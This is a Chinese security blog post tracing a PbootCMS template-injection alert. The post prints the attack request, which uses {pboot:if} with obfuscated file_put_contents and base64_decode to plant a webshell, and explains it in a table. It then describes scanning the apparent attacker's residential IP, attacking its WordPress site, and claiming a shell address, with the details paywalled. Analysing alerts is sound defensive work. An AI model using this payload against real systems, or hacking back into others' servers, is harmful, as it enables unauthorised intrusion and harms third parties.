记一起攻击告警的溯源到收获片片

记一起攻击告警的溯源到收获片片_秃兔安全
shell地址
此内容为付费阅读,请付费后查看
会员专属资源
您暂无购买权限,请先开通会员
开通会员
付费阅读
已售 17
记一起攻击告警的溯源到收获片片-秃兔安全

PbootCMS 模板注入{pboot:if}是PbootCMS的条件判断标签,攻击者利用模板引擎漏洞执行任意PHP代码可能某个黑客路过尝试一下

GET /{pboot:if((\"file_put_co\".\"ntents\")(\"temp.php\",(\"base6\".\"4_decode\")(\"删掉了")))}{/pboot:if}/../../?p=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Referer: http://n.....com

告警分析

关键字段内容分析攻击风险评估
请求路径/{pboot:if((\"file_put_co\".\"ntents\")(\"temp.php\",...))}{/pboot:if}/../../?p=1包含PbootCMS模板标签{pboot:if},内嵌 PHP 代码执行文件操作
执行动作file_put_contents("temp.php", base64_decode("..."))将 Base64 解码后的恶意代码写入 temp.php 文件(Webshell 植入)
Base64 解码内容创建并执行远程 PHP 文件,最终删除自身(典型 Webshell 行为)
请求频率5 分钟内 18 次请求可能在尝试绕过防护机制或验证漏洞利用效果
来源特征User-Agent为正常浏览器,但Referer指向片片网站利用片片网站作为攻击跳板,隐藏真实来源

群里讨论

记一起攻击告警的溯源到收获片片-秃兔安全

提交沙箱

记一起攻击告警的溯源到收获片片-秃兔安全

删掉的地址指向一个txt,有人提交过了

记一起攻击告警的溯源到收获片片-秃兔安全

看看txt的内容,没有什么有用的东西

记一起攻击告警的溯源到收获片片-秃兔安全

黑客的服务器就开了两个端口

算了,看看Referer发现指向难以描述的网站

记一起攻击告警的溯源到收获片片-秃兔安全

前往下载APP的地址

记一起攻击告警的溯源到收获片片-秃兔安全
记一起攻击告警的溯源到收获片片-秃兔安全

指向江苏住宅IP

是江苏的精神小伙吗

记一起攻击告警的溯源到收获片片-秃兔安全

nmap扫了一下发现开放端口88和8888和几个常用端口

访问端口88首页看见是Wordpress初始页面

记一起攻击告警的溯源到收获片片-秃兔安全

一顿疯狂尝试

记一起攻击告警的溯源到收获片片-秃兔安全
记一起攻击告警的溯源到收获片片-秃兔安全
记一起攻击告警的溯源到收获片片-秃兔安全

shell地址:

很高兴认识你

2班3组徐XX

© 版权声明
THE END
喜欢就支持一下吧
点赞9 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容